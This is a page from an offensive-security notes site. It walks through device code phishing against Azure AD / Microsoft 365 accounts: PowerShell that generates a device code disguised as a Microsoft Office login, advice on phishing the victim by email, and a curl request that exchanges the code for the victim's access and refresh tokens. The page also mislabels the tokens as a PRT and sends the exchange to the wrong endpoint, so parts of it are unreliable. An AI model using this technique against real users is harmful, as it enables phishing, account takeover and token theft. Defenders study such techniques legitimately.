🦦
Otter's Notes
  • Introduction
  • Articles
    • Dumping data from the Microsoft Recall folder
    • Gaining persistence on Windows with Time Providers
    • Reverse engineering LSASS to decrypt DPAPI keys
    • Intro to Hypervisor Implants
    • In-depth Windows Telemetry
  • Notes
    • Active Directory
      • Active Directory Structure
      • Active Directory Terminology
      • Active Directory Objects
      • Active Directory Groups
      • Active Directory Functionality
      • Active Directory Protocols
      • Active Directory Rights and Privileges
      • Security in Active Directory
      • Users and Machine Accounts
      • NTLM
      • LDAP
      • Making a Target User List
      • Enumerating & Retrieving Password Policies
      • Enumerating Security Controls
      • Examining Group Policy
      • GPOs
      • LAPS
      • LLMNR & NBT-NS Poisoning
      • LOLBIN Enumeration
    • AAD
      • Useful Links
      • Overview of Azure & M365
      • Enumerate Users and Domains
      • Post-exploitation Reconnaissance
      • OAuth 2.0 Abuse
      • Abusing Device Code Authentication
      • Abusing Cloud Administrator Role
      • Abusing User Administrator Role
      • AAD Federated Backdoor
      • Service Principal Abuse
      • Compromising Azure Blobs and Storage Accounts
      • Malicious Device Join
      • Disabling Auditing (Unified Audit Logs)
      • Spoofing Azure Sign-In Logs
      • Registering Fake Agents for Log Spoofing
      • Pass the PRT
      • Pass the Cookie
      • Abusing Managed Identities
      • Virtual Machine Abuse
      • Attacking Key Vaults
    • Forest Trust Abuse
      • Parent-Child Trust Abuse
      • One-Way Inbound Trust Abuse
      • Foreign Group Membership
      • Foreign ACL Principals
      • SID History
      • SID Filter Bypass
      • Intra-Forest Attacks
        • Configuration Naming Context Replication
        • ADCS NC Replication Attack
        • GPO On-Site Attack
        • GoldenGMSA Attack
        • DNS Trust Attack
      • Cross-Forest Attacks
        • Trust Account Attack
        • Abusing SQL Linked Servers
        • Abusing PAM Trusts
    • Kerberos
      • Overview of Kerberos Authentication
      • Silver Tickets
      • Golden Tickets
      • Diamond Tickets
      • Kerberoasting
      • AS-REPRoasting
      • Resource-Based Constrained Delegation
      • Constrained Delegation
      • Unconstrained Delegation
      • S4U2Self & S4U2Proxy
      • Golden Certificates
    • DACL Abuse
      • DACL Overview
      • DACLs Enumeration
      • AddMembers
      • GPO Attacks
      • Granting Rights and Ownership
      • Logon Scripts
      • NoPAC
      • Password Abuse
      • SPN Jacking
      • Shadow Credentials
      • Targeted Kerberoasting
    • ADCS
      • Introduction to ADCS
      • ESC1
      • ESC2
      • ESC3
      • ESC4
      • ESC5
      • ESC6
      • ESC7
      • ESC8
      • ESC9
      • ESC10
      • ESC11
      • Certificate Mapping
    • PowerShell
      • PowerShell Basics
      • PowerShell Remoting
      • Alternate PowerShell Hosts
      • PowerShell Pipeline Runners
      • PowerShell Code Signing
      • Scriptblock Logging
      • PowerShell CLM
      • AMSI
      • PowerShell Reflection
      • WMI - Windows Management Instrumentation
      • Interfacing with AD
      • PowerShell Snippets
        • Bypass application whitelisting and CLM with runscripthelper and WMI
        • Create fake PowerShell logs
        • Enumerate AD ACLs
        • Enumerate WMI events
        • Enumerate Domain Trusts
        • Enumerate change metadata
        • Enumerate non-signed service binaries
        • Enumerate with GPOs
        • Find signed alternate PowerShell hosts
        • Get AMSI module
        • Group processes by user with WMI
        • Hide processes from Get-Process
        • Malware re-purposing with PowerShell reflection
        • Monitor PowerShell hosts with WMI
        • PowerShell reflection offensive use-case
        • Query PowerShell alternative hosts with WMI
        • Retrieve file certificate
        • Search LDAP for misconfigurations
        • Sign custom code with PowerShell
        • WMI service creation
        • Weak folder permission enumeration
    • AWS
      • AWS Organizations
      • AWS Principals
    • Binary Exploitation
      • Environment setup for Browser Exploitation
      • Browser Overview and Components
    • Kernel Development
      • Windows
        • Configuring a VM for driver development
Powered by GitBook
On this page
  1. Notes
  2. AAD

Abusing Device Code Authentication

PreviousOAuth 2.0 AbuseNextAbusing Cloud Administrator Role

Last updated 1 year ago

Device Code Authentication allows to compromise a AAD / M365 account just like OAuth Abuse but it's generally harder to detect / set up and doesn't require any input from the victim. The downside to this technique is that the device codes are valid for only a brief period of time (like 15 - 20 minutes) but since the attack allows to get a full PRT (access token + refresh token) it's possible to refresh the tokens for prolonged access.

To perform this attack we need to generate a URL to phish the user with using endpoint (https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0).

For example, if we wanted to generate a link to phish for MS Graph access, the setup would look like something like this

PS /home/otter> $body=@{
>> "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
>> "resource" = "https://graph.microsoft.com"
>> }
PS /home/otter> $authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" -Body $body
PS /home/otter> $authResponse

user_code        : DQ3XNJXQS
device_code      : DAQABIQEAAADnfolhJpSnRYB1SVj-Hgd8UGlgrzcx_dLPNZrsSg2n7s2cJ7NUwT6Or8qUm8WorQnuVlGKVyavcbWqb1WG6kXei2J6-bmJt1OcBJslnUrIt5yhyb_bGqaaMpb2CdLPNSsqU-vJcnwyHqJrw40FWX_q46ydAuxVU8i4Qbnj6Ruo9qYKd7GWdaG1a4FDLI4Cc3UgAA
verification_url : https://microsoft.com/devicelogin
expires_in       : 900
interval         : 5
message          : To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code DQ3XNJXQS to authenticate.

In this case we used a client_id of Microsoft Office to which corresponds to Microsoft Office as listed but we can pick a different application to "disguise" our request as.

Now the attacker can send a phishing email using a template like to try and get the victim's access token. Mind that you have to replace the code shown in the email (USER_CODE on line 223 of the gist) with the user_code you got during the setup process.

This technique can prove to be extremely effective as the user only visits legitimate Microsoft endpoints.

Once the victim follows the instructions in the email, we'll be able to send a POST request to the https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0 endpoint with the following data:

  • client_id

  • resource

  • grant_type

  • code

~ ∮ curl \
> --data client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c \
> --data resource=https://graph.microsoft.com \
> --data grant_type=ietf:params:oauth:grant_type:device_code \
> --data code=DAQABIQEAAADnfolhJpSnRYB1SVj-Hgd8UGlgrzcx_dLPNZrsSg2n7s2cJ7NUwT6Or8qUm8WorQnuVlGKVyavcbWqb1WG6kXei2J6-bmJt1OcBJslnUrIt5yhyb_bGqaaMpb2CdLPNSsqU-vJcnwyHqJrw40FWX_q46ydAuxVU8i4Qbnj6Ruo9qYKd7GWdaG1a4FDLI4Cc3UgAA \
> 'https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0'

If a user has successfully authenticated to this endpoint with our user code we'll be able to get a full PRT (both access and refresh tokens) in the request's output.

The PRT can then be used in requests based on the scope of the token itself just by adding a authentication header

...
Authorization: Bearer <PRT>
...
this
here
this one